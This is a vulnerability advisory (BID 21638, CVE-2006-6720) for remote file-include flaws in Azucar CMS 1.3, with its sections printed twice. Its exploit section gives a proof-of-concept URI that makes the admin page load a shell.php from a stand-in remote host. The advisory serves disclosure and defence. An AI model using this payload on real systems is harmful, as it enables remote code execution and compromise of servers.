Azucar CMS '$_GET[_VIEW]' Parameter Multiple Remote File Include Vulnerabilities
BID:21638
Info
Azucar CMS '$_GET[_VIEW]' Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 21638 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-6720 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 18 2006 12:00AM |
| Updated: | Feb 05 2008 08:46PM |
| Credit: | nuffsaid is credited with the discovery of the original issue. Alexandr Polyakov and Stas Svistunovich of the Digital Security Research Group have provided additional details. |
| Vulnerable: |
Azucar CMS Azucar CMS 1.3 |
| Not Vulnerable: | |
Discussion
Azucar CMS '$_GET[_VIEW]' Parameter Multiple Remote File Include Vulnerabilities
Azucar CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Azucar CMS 1.3 is vulnerable to these issues; other versions may also be affected.
NOTE: This BID was formerly titled 'Azucar CMS Index_sitios.PHP Remote File Include Vulnerability' but has been updated to reflect new information.
Azucar CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Azucar CMS 1.3 is vulnerable to these issues; other versions may also be affected.
NOTE: This BID was formerly titled 'Azucar CMS Index_sitios.PHP Remote File Include Vulnerability' but has been updated to reflect new information.
Exploit / POC
Azucar CMS '$_GET[_VIEW]' Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URI is available:
http://www.example.com/admin/index_sitios.php?_VIEW=http://www.example2.com/shell.php
The following example URIs are available:
An attacker can exploit these issues via a browser.
The following proof-of-concept URI is available:
http://www.example.com/admin/index_sitios.php?_VIEW=http://www.example2.com/shell.php
The following example URIs are available:
Solution / Fix
Azucar CMS '$_GET[_VIEW]' Parameter Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Azucar CMS '$_GET[_VIEW]' Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- Azucar CMS Homepage (Azucar CMS)
- [DSECRG-08-012] Multiple LFI in Azucar CMS 1.3 ("Digital Security Research Group \[DSecRG\]"
)